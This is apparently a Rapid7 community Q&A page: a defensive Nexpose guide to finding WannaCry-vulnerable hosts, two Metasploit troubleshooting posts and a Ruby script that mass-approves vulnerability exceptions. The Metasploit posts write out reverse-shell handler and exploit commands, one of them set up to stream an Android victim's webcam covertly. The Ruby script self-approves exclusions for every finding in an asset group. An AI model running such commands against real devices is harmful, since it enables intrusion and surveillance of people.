4
ANSWERED

Nexpose: WannaCry - Scanning & Reporting [00jay]

In light of the recent WannaCry Ransomware attacks, I thought it'd be great to share ways of finding out which assets are susceptible to this attack.

1. Create a custom scan template to check for MS17-010

The easiest way to create a custom template is by making a copy of an existing template:

* Administration tab -> Templates
* Click: "Manage"
* Copy the "Full audit enhanced logging without Web Spider" template
* IMPORTANT: Name your copy of the scan template
* Click: "Vulnerability Checks" tab
* Expand: "By Individual Check" dropdown
* Click: "Add Checks" button
* Enter: MS17-010 (As of 5/15/17, there are 192 individual checks)

Be sure to remove all checks from the "By Category" and "By Check Type" sections to ensure that only the individual checks are loaded for the scan(s).

2. If you want to create a Dynamic Asset Group (DAG) for assets vulnerable to this attack:

* Create a new DAG with the following filters:
  * 'CVE ID' 'is' CVE-2017-0143
  * 'CVE ID' 'is' CVE-2017-0144
  * 'CVE ID' 'is' CVE-2017-0145
  * 'CVE ID' 'is' CVE-2017-0146
  * 'CVE ID' 'is' CVE-2017-0147
  * 'CVE ID' 'is' CVE-2017-0148
* Change "Match (all) of the specified filters." to "Match (any) of the specified filters."
* Hit "SEARCH".

You should then have a result of all assets that have ANY of those CVEs specified above.

3. You can also create a SQL report to list ANY asset affected by ANY of the 6 CVEs:

```sql
SELECT da.ip_address  AS "IP Address",
       da.host_name   AS "Host Name",
       dv.title       AS "Title",
       dv.description AS "Description",
       dv.severity    AS "Severity"
FROM dim_vulnerability dv
JOIN dim_asset_vulnerability_solution das USING (vulnerability_id)
JOIN dim_asset da USING (asset_id)
WHERE dv.title ILIKE '%2017-0143%'
   OR dv.title ILIKE '%2017-0144%'
   OR dv.title ILIKE '%2017-0145%'
   OR dv.title ILIKE '%2017-0146%'
   OR dv.title ILIKE '%2017-0147%'
   OR dv.title ILIKE '%2017-0148%'
```

(Please keep in mind that it will list every instance of any of the CVEs in question.)

There are currently 32 checks for each CVE, and there are 6 CVEs, for a total of 192 checks. However, an asset should not list more than one check for each CVE, which should result in at most 6 instances per asset. You can write a SQL query that returns only the count of unique instances per asset, so that the report contains fewer rows.

Posted by Edward Sheehy about a year ago
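As an added example, not part of the post above, here is the per-asset count that the last paragraph describes, written for the Nexpose reporting data model (PostgreSQL). It collapses the report to one row per host and matches on the CVE reference instead of a title substring, so a `'%2017-0143%'` pattern cannot collide with an unrelated title. The table and column names `fact_asset_vulnerability_finding`, `dim_vulnerability_reference`, `source` and `reference` are assumptions about that data model; the post itself only uses `dim_vulnerability`, `dim_asset_vulnerability_solution` and `dim_asset`.

```sql
-- Added example (not from the original post).
-- One row per asset with the number of distinct MS17-010 CVEs found on it.
-- Assumes the Nexpose reporting data model tables
--   fact_asset_vulnerability_finding (asset_id, vulnerability_id, ...)
--   dim_vulnerability_reference      (vulnerability_id, source, reference)
-- The CTE resolves the six CVE references to vulnerability ids once, so the
-- join below is on an exact reference rather than a title substring.
WITH ms17_010 AS (
  SELECT DISTINCT dvr.vulnerability_id,
                  dvr.reference AS cve
  FROM dim_vulnerability_reference dvr
  WHERE dvr.source = 'CVE'
    AND dvr.reference IN ('CVE-2017-0143', 'CVE-2017-0144', 'CVE-2017-0145',
                          'CVE-2017-0146', 'CVE-2017-0147', 'CVE-2017-0148')
)
SELECT da.ip_address                    AS "IP Address",
       da.host_name                     AS "Host Name",
       COUNT(DISTINCT m.cve)            AS "MS17-010 CVE Count",
       string_agg(DISTINCT m.cve, ', ') AS "CVEs"
FROM fact_asset_vulnerability_finding favf
JOIN ms17_010 m  USING (vulnerability_id)
JOIN dim_asset da USING (asset_id)
GROUP BY da.ip_address, da.host_name
ORDER BY "MS17-010 CVE Count" DESC, da.ip_address;
```

Because the same CVE can be reported by several individual checks, `COUNT(DISTINCT m.cve)` rather than `COUNT(*)` is what keeps the count at the "at most 6 per asset" figure the post expects; a host showing fewer than 6 is still unpatched and still belongs in the DAG from step 2.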

2
ANSWERED

Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole:

~~~~
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.240
set LPORT 3460
set ExitOnSession false
set AutoRunScript multi_console_command -rc scriptcamandroid.rc
exploit -j -z
~~~~

In the Metasploit root, the file `scriptcamandroid.rc` has the following commands:

~~~~
webcam_stream -i 2 -q 45 -d 84000
exit
~~~~

After Metasploit opens the session, it automatically starts autorun with this multi console command:

~~~~
Session ID 1 (192.168.0.240:3460 -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc'
Multi Command Execution Meterpreter Script Console
~~~~

OPTIONS:

~~~~
-cl <opt>  Commands to execute. The command must be enclosed in double quotes and separated by a comma.
-h         Help menu.
-rc <opt>  Text file with list of commands, one per line.
-sl        Hide commands for work in background sessions
~~~~

The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the Linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly. I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Posted by Stephanie Coyle about a year ago

1
ANSWERED

Metasploit: I receive a msfcli error when experimenting with Kali Linux [hcl]

I just started my experiments with Metasploit on Kali Linux. Here's what I did:

~~~~
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
~~~~

Pivoting to another:

~~~~
msf exploit(handler) > search samba
[!] Database not connected or cache not built, using slow search
~~~~

However, `db_rebuild_cache` did not help.

~~~~
msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp
[-] The value specified for PAYLOAD is not valid.
msf exploit(lsa_transnames_heap) > show payloads
msf exploit(lsa_transnames_heap) >
~~~~

Is there a reason why there are no payloads? The same payload loads fine in msfconsole.

After that I did some testing and scrolling through commands, and this error pops up:

~~~~
[-] RbReadline Error: TypeError no implicit conversion from nil to integer
["/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `[]'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `update_line'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3526:in `block in rl_redisplay'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `each'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `rl_redisplay'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4665:in `_rl_internal_char_cleanup'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4726:in `readline_internal_charloop'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4790:in `readline_internal'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4812:in `readline'",
 "/opt/metasploit/apps/pro/msf3/lib/readline_compatible.rb:77:in `readline'",
 "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'",
 "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'",
 "/opt/metasploit/apps/pro/msf3/msfconsole:169:in `<main>'"]
~~~~

Well, after that I gave it another shot, and here is what I received:

~~~~
msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

[-] Invalid payload defined: linux/x86/shell/reverse_tcp
~~~~

The first two problems appear on two different machines; on the other two I did not try to replicate "database not connected" and the "payload problem". Is msfcli being deprecated?

Posted by Stephanie Coyle about a year ago

1
ANSWERED

Nexpose: Exclude All Vulnerabilities in an Asset Group [Kyle Burk]

It's not unheard of for me to receive a request to whitelist a particular subset of machines in Nexpose. After looking around on the forums and contacting Rapid7 support, I was told it is not possible to exclude all vulnerabilities in an asset group. Then I saw Chris Brown's script where he excludes a single vuln across an asset group. So I decided to learn some Ruby and came up with our own solution. Excuse my lack of formatting and the places where I didn't know how to handle certain input (I promise it still works). If you need a similar solution, you can run this script:

~~~~ruby
#!/usr/bin/env ruby
require 'date'
require 'nexpose'
require 'highline/import'

# Default values
@host = 'nexpose.domain.com'
@port = 3780

puts "Connecting to Nexpose Console..."
3.times { puts }
puts "Please input your username for nexpose."
3.times { puts }

def get_username(prompt = 'Username: ')
  ask(prompt) { |query| query.echo = true }
end
@user = get_username

puts "Please input your password."
3.times { puts }

def get_password(prompt = 'Password: ')
  ask(prompt) { |query| query.echo = false }
end
@password = get_password

puts "logging in..."
# create object for the nexpose connection
nsc = Nexpose::Connection.new(@host, @user, @password, @port)
nsc.login

puts "listing asset groups..."
# query list of asset groups
assetGroupList = nsc.list_asset_groups
assetGroupList.each do |groupid|
  puts "GroupID: #{groupid.id} --- Group Name: #{groupid.name}"
end
3.times { puts }

def get_target(prompt = 'Please input target group ID')
  ask(prompt) { |query| query.echo = true }
end
@target = get_target
t = @target.to_i
3.times { puts }

puts "-----------------------------------------------"
puts "We will now begin excluding all vulnerabilities"
puts "on all assets in the selected asset group."
puts "-----------------------------------------------"
3.times { puts }
puts "Please select a reason for the Exception"
puts "I haven't figured out how to handle 'other' yet"
puts "so if you choose anything other than what is "
puts "below, I'm going to make this script exit."
puts ""
puts "1 -- False Positive"
puts "2 -- Compensating Control"
puts "3 -- Acceptable Use"
puts "4 -- Acceptable Risk"

def get_reason(prompt = 'Select Your Reason (1-4):')
  ask(prompt) { |query| query.echo = true }
end
rsn = get_reason
# map the menu choice onto the nexpose gem's exception reason constants
case rsn
when "1"
  rsn = Nexpose::VulnException::Reason::FALSE_POSITIVE
when "2"
  rsn = Nexpose::VulnException::Reason::COMPENSATING_CONTROL
when "3"
  rsn = Nexpose::VulnException::Reason::ACCEPTABLE_USE
when "4"
  rsn = Nexpose::VulnException::Reason::ACCEPTABLE_RISK
else
  puts "I don't know how to handle other, exiting now."
  abort
end
3.times { puts }

puts "Please enter the comment/justification for the exclusion. ('EXC-1234')"
def get_comment(prompt = 'Comment:')
  ask(prompt) { |query| query.echo = true }
end
@comment = get_comment
3.times { puts }

puts "To properly format the expiration date, we need to collect"
puts " the month, day and year separately. sorry about this."
def get_year(prompt = 'Provide the expiration year (1999):')
  ask(prompt) { |query| query.echo = true }
end
@year = get_year
y = @year.to_i
3.times { puts }

def get_month(prompt = 'Provide the 2-digit expiration month (12):')
  ask(prompt) { |query| query.echo = true }
end
@month = get_month
m = @month.to_i
3.times { puts }

def get_day(prompt = 'Provide the 2-digit expiration day (22):')
  ask(prompt) { |query| query.echo = true }
end
@day = get_day
d = @day.to_i

expiration_date = Date.new(y, m, d)
review_comments = "Auto approved by submitter."
scope = Nexpose::VulnException::Scope::ALL_INSTANCES_ON_A_SPECIFIC_ASSET

# walk every asset in the chosen group and file, then approve,
# one exception per vulnerability found on that asset
assets = nsc.group_assets(t)
assets.each do |asset|
  vulns = nsc.list_asset_vulns(asset.id)
  vulns.each do |vuln|
    exc = Nexpose::VulnException.new(vuln.id, scope, rsn)
    exc.asset_id = asset.id
    exc.save(nsc, @comment)
    exc.update_expiration_date(nsc, expiration_date)
    exc.approve(nsc, review_comments)
  end
end
~~~~

Posted by Edward Sheehy about a year ago